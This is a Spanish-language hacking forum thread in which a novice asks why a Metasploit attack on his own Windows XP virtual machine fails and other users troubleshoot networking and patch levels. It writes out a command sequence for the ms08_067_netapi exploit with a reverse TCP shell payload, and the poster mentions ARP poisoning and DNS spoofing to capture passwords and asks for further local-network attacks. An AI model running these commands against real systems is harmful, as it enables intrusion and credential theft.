 Autor
|
Tema: Metasploit (Leído 12,721 veces)
|
n3n3
 Desconectado
Mensajes: 27
¡Soy n3n3 y tu no!
|
 Espero puedan ayudarme, ya que me concidero novato y me gusta mucho aprender. Tengo en una maquina virtual montado Kali Linux y en otra Backtrack 5 r3 y en la tercera tengo Win Xp y e estado intentando hacerme de una windows shell dentro de la que tiene WinXP desde kali y backtrack, pero hasta ahora solo e logrado fracasar, no me e rendido, pero si me pudieran guiar, explicar o proporcionar algun otro metedo. lo e estado intentando con el PAYLOAD desde MSFCONSOLE, tambien con ARMITAGE e usado tambien estos comandos que les escribire tal cual los use:  use exploit/windows/smb/ms08_067_netapi set RHOST 000.000.000.000 <-----Ip a atacar set payload windows/shell/reverse_tcp set LHOST 000.000.000.000 <----Ip atacante exploit Pero tampoco dan resultado, simplemente no carga el exploit, o me dice algo del packete en ingles, o (no-targget), pero siempre ingreso la ip de la victima que en este caso es mi otra maquina virtual, las tres maquinas las tengo en modo britged, (adaptador puente)desde VBox Ayudame por favor *****************************************************************************
|
|
|
|
|
En línea
|
“Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos.” |
|
|
|
MCKSys Argentina
|
Una pregunta: el XP es vulnerable? Osea, está actualizado o no? Si está patcheado, no funcionará el exploit...  Saludos! |
|
|
|
|
En línea
|
MCKSys Argentina "Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando." |
|
|
n3n3
Desconectado
Mensajes: 27
¡Soy n3n3 y tu no!
|
Amigo tiene apenas 1 dia de que lo tengo instalado, pero de ser asi lo reinstalo, es un XP SP 3 Pero mi moden tengo abiertos los puertos, y yo creo que debe de haber alguna manera para poder penetrar en la maquina, no importa si esta actualizado, por eso mismo posteo mi duda, haber si alguien conoce alguna forma de hackear ese Xp sp3 o windows 7 desde backtrack 5 o kali linux desde metasploit o alguna otra manera, la que sea no importa solo quiero aprender alguna que sea exitosa  |
|
|
|
|
En línea
|
“Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos.” |
|
|
noopynoob
Desconectado
Mensajes: 104
|
que yo sepa no se puede desde una maquina virtual ya que la IP no esta dentro del rango, hay que tener dos maquinas para realizar el ataque
|
|
|
|
|
En línea
|
|
|
|
n3n3
Desconectado
Mensajes: 27
¡Soy n3n3 y tu no!
|
Pues ya realize desde una de mis maquinas con backtrack 5 hice un ataque DNS Spoffing y envenenamiento de ARP para obtener claves de mi maquina tangible, osea la principal, y si me funciono, pero agradeceria si alguien me hace saber algun metodo que pueda yo utlizar, y pues escanear bulnerabilidades con nmap desde backtrack, y que ataques conocen para una red local??????????? Porfavor algun ataque para una red local, que yo pueda probar en mi pequeña red? |
|
|
|
|
En línea
|
“Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos.” |
|
|
noopynoob
Desconectado
Mensajes: 104
|
Pues ya realize desde una de mis maquinas con backtrack 5 hice un ataque DNS Spoffing y envenenamiento de ARP para obtener claves de mi maquina tangible, osea la principal, y si me funciono, pero agradeceria si alguien me hace saber algun metodo que pueda yo utlizar, y pues escanear bulnerabilidades con nmap desde backtrack, y que ataques conocen para una red local??????????? Porfavor algun ataque para una red local, que yo pueda probar en mi pequeña red? pues se puede hacer el ARP spoofing desde una maquina virtual pero solo afectara a la maquina en donde esta corriendo la maquina virtual y no en las demás, una vez intente penetrar win8 desde backtrack que corría en una maquina virtual y no me funciono entonces quite la mv e inicie backtrack en una laptop y el ataque si funciono.
|
|
|
|
|
En línea
|
|
|
|
n3n3
Desconectado
Mensajes: 27
¡Soy n3n3 y tu no!
|
Ok intentare los ataques desde una PC fisica, y posteriormente voy a postear los resultados obtenidos, muchas gracias.
|
|
|
|
|
En línea
|
“Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos.” |
|
|
|
engel lex
|
que maquina virtual usas? porque depende de ella puedes configurar las ip y todo eso para simular una red real |
|
|
|
|
En línea
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
n3n3
Desconectado
Mensajes: 27
¡Soy n3n3 y tu no!
|
Uso Virtual Box, lo que pasa que en YouTube hay videos donde realizan ataques con armitage, y tambien manualmente con el Metasploid, haciendose de una shell windows, en estas mismas maquinas virtuales, y hasta ahora no me a funcionado ni en NAT ni en Bridgeb. Ayuendeme de cual es el problema, hago escaneo con nmap y me aparecen mis maquinas fisicas en el kali virtual, pero la otra PC con WinXp que es virtual tambien, no me aparece. Tambien cuando ataco la mia que tiene Win7 Ultimate, me sale el siguiente error desde metasploit, me imagino que es por que no es vulnerable a este tipo de ataque, ustedes que opinan sobre este otro tema...  |
|
|
|
|
En línea
|
“Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos.” |
|
|
Owl-City
Desconectado
Mensajes: 44
Ésta es mi respuesta, ¿Y tu respuesta?
|
Hola, Amigo, te compadezco, no soy un profesional, no quiero ser necio, pero específicamente que exploit usaste, no me des el proceso solo el nombre, porque si es un payload, tienes que es pecificar. Me explico: Es de x86 o x64. Se que usaste Cain y Abel, para hacer tus ataques de contraseña y envenenar la red. Y sí, es automático, por eso te dio en el blanco. Lo mejor que puedes hacer es programarte tu propio exploit en una terminal  |
|
|
|
« Última modificación: 27 Enero 2014, 23:32 pm por Owl-City »
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
[Metasploit] Usar Keylogger del Metasploit
Hacking
|
Shell Root
|
5
|
17,462
|
23 Abril 2011, 20:59 pm
por Edu
|
|
|
|
metasploit
Bugs y Exploits
|
rickdeckard
|
0
|
2,664
|
27 Febrero 2012, 00:39 am
por rickdeckard
|
|
|
|
Metasploit + Uso
Bugs y Exploits
|
MeCraniDOS
|
2
|
4,653
|
5 Noviembre 2012, 00:26 am
por MeCraniDOS
|
|
|
|
Metasploit
Hacking
|
Stakewinner00
|
0
|
2,165
|
2 Febrero 2013, 20:13 pm
por Stakewinner00
|
|
|
|
Metasploit en NAT
Hacking
|
raskan
|
3
|
3,144
|
25 Marzo 2013, 18:37 pm
por int_0x40
|
 |
